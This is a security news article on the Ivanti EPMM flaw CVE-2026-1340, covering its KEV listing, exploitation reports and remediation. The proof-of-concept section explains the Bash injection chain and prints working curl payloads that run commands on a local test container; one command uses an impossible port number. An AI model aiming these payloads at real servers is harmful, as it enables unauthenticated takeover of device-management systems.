The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has placed a second critical Ivanti Endpoint Manager Mobile (EPMM) bug, CVE-2026-1340, into its Known Exploited Vulnerabilities (KEV) catalog after confirming it is being abused in the wild. The flaw is a code-injection weakness that grants unauthenticated remote code execution and carries a maximum-tier CVSS score of 9.8. Federal civilian executive branch (FCEB) agencies were ordered to remediate by April 11, 2026. A public proof-of-concept is already circulating, and researchers say the vulnerability has been hit thousands of times since disclosure.

What CVE-2026-1340 is

EPMM is Ivanti's mobile device management (MDM) platform, broadly deployed across government and enterprise fleets to enroll and secure endpoints. CVE-2026-1340 sits in that platform as a code-injection defect that needs no authentication to trigger. Any attacker who can reach a vulnerable instance over the network can execute arbitrary code on the host — opening the door to full system takeover, data theft, malware deployment, and lateral movement deeper into the environment.

The bug is effectively a twin of CVE-2026-1281, a separate code-injection flaw Ivanti disclosed at the same time in late January 2026. Both share the 9.8 severity rating and the same unauthenticated RCE exploitation path. CVE-2026-1281 was added to the KEV catalog right away; CVE-2026-1340 only followed months later.

Disclosure-to-exploitation timeline

  • Late January 2026 — Ivanti disclosed CVE-2026-1340 and CVE-2026-1281 together. CVE-2026-1281 was immediately added to KEV. Ivanti shipped an RPM package as an instant, zero-downtime mitigation.
  • Shortly after — Exploitation kicked off once a proof-of-concept went public; Ivanti said it was aware of a "very limited number" of affected customers at the time.
  • February 2026 — The European Commission and Dutch authorities opened investigations into incidents tied to both CVEs.
  • March 18, 2026 — Ivanti released EPMM 12.8, fully fixing both flaws and adding further hardening.
  • April 9, 2026 — CISA formally added CVE-2026-1340 to the KEV catalog, setting an April 11 deadline for federal agencies.

Thousands of exploitation attempts

Several researchers questioned why CISA waited so long, given that attacks against CVE-2026-1340 had been running for months. CISA offered no specific rationale, pointing only to its general guidance on how flaws qualify for the catalog.

"It's been repeatedly exploited literally thousands of times since it was disclosed." — Simo Kohonen, Founder and CEO, Defused

Other independent researchers backed that up, noting no recent spike in activity that would explain the late listing. The practical takeaway: any organization that hadn't patched has been sitting in the path of a sustained, high-volume campaign for months.

How the vulnerability works

The public reproduction project — YunfeiGE18/CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE — demonstrates that the root cause is an abuse of Bash arithmetic expansion. When a variable that references another variable is evaluated in an arithmetic context, and the referenced variable contains an array index built with command substitution, the embedded command runs.

The chain plays out like this:

  • The request supplies st=theValue (the literal string theValue with padding).
  • The request also supplies h=gPath[\ command] — a command tucked inside an array index.
  • A Bash script parses the key=value pairs in a loop, reassigning theValue on each pass.
  • gStartTime ends up set to the literal string theValue.
  • After the loop, theValue holds gPath[\ command].
  • When [[ ${currentTime} -gt ${gStartTime} ]] is evaluated:

- ${gStartTime}"theValue" (a string) - Arithmetic context treats theValue as a variable reference - theValuegPath[\ command] - The array index triggers command substitution → RCE

Proof of concept

The demo ships as a container that stands in for a vulnerable EPMM endpoint. Bring it up and confirm it's healthy:


# Build and start the container
docker-compose up --build -d

# Check it's running
curl http://localhost:8180/health

Prove command execution by writing a file on the target:


# URL-encoded payload: id > /mi/poc
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"

# Check if file was created
cat artifacts/poc

A time-based check confirms blind command execution via an injected sleep:


# Should take ~5 seconds to respond
time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"

International response

The blast radius extends well past the U.S. Both the European Commission and Dutch authorities launched formal investigations in February 2026 into incidents linked to CVE-2026-1340 and CVE-2026-1281. Ivanti partnered with the National Cyber Security Centre (NCSC) of the Netherlands to build detection scripts and indicators of compromise (IoCs), which were released to the community alongside technical analysis.

What Ivanti has shipped to defenders

  • RPM mitigation package — applied in seconds with no downtime, released at disclosure as a stopgap.
  • Indicators of compromise — published so teams can check whether they were targeted.
  • Technical analysis — documenting the flaw's behavior and exploitation patterns.
  • Detection script — co-developed with the Dutch NCSC to surface signs of prior compromise.
  • EPMM 12.8 — the full fix released March 18, 2026, with additional hardening.

An Ivanti spokesperson stressed that upgrading to version 12.8 is the definitive remediation.

Detection and mitigation

Whether or not the FCEB mandate applies to you, treat the KEV listing as a directive to act now:

  • Upgrade to Ivanti EPMM 12.8 immediately if you haven't already.
  • Apply the RPM mitigation package as a stopgap when an upgrade can't happen right away.
  • Run Ivanti's detection script (built with the Dutch NCSC) to hunt for evidence of prior compromise.
  • Correlate the published IoCs against your SIEM, EDR, and network logs.
  • Audit internet-exposed EPMM instances and restrict access pending full remediation.
  • Report confirmed compromise to CISA and the relevant national authorities.

Why this keeps happening to Ivanti

CVE-2026-1340 extends a run of high-severity Ivanti vulnerabilities that have drawn heavy attention from both attackers and governments. The recurring pattern — a PoC dropping and mass exploitation following almost immediately — is a reminder to patch fast and to treat MDM infrastructure as high-value attack surface deserving priority hardening. That a flaw with thousands of documented exploitation attempts took months to enter the KEV catalog also raises uncomfortable questions about the detection and reporting pipelines that vendors and the wider community rely on.

Bottom line

With a 9.8 CVSS score, unauthenticated RCE, and a confirmed history of mass exploitation, CVE-2026-1340 demands immediate attention from every Ivanti EPMM operator. Upgrading to 12.8 closes the hole — but given the volume of attacks already observed, organizations should also run a thorough forensic investigation to determine whether they were among the thousands already hit. Keep the KEV catalog in your remediation workflow and prioritize listed flaws; in this threat environment, a few days of delay can be the gap between a near-miss and a full breach.